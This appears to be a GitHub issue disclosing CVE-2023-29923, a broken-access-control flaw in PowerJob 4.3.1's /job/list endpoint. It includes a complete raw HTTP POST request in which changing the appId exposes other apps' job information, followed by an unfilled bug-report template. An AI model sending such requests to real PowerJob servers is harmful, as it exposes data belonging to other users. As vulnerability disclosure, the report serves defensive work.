Headline
CVE-2023-29923: I want to report an unauthorized access vulnerability · Issue #587 · PowerJob/PowerJob
PowerJob V4.3.1 is vulnerable to Insecure Permissions. via the list job interface.
Describe the bug
A clear and concise description of what the bug is.
Hello teams,I want to report an unauthorized access vulnerability
just edit the id and send the packet:
POST /job/list HTTP/1.1
Host: test.cn:7700
Content-Length: 35
Accept: application/json, text/plain, /
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 Edg/110.0.1587.69
Content-Type: application/json;charset=UTF-8
Origin: http://test.cn:7700
Referer: http://test.cn:7700/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Connection: close
{"appId":1,"index":0,"pageSize":10}
Now you can view information of any app.
To Reproduce
Steps to reproduce the behavior.
Expected behavior
A clear and concise description of what you expected to happen.
Environment
- PowerJob Version: [e.g. 3.0.0]
- Java Version: [e.g. OpenJDK 8]
- OS: [e.g. CentOS 8.1]
Screenshots
If applicable, add screenshots to help explain your problem.
Additional context
Add any other context about the problem here.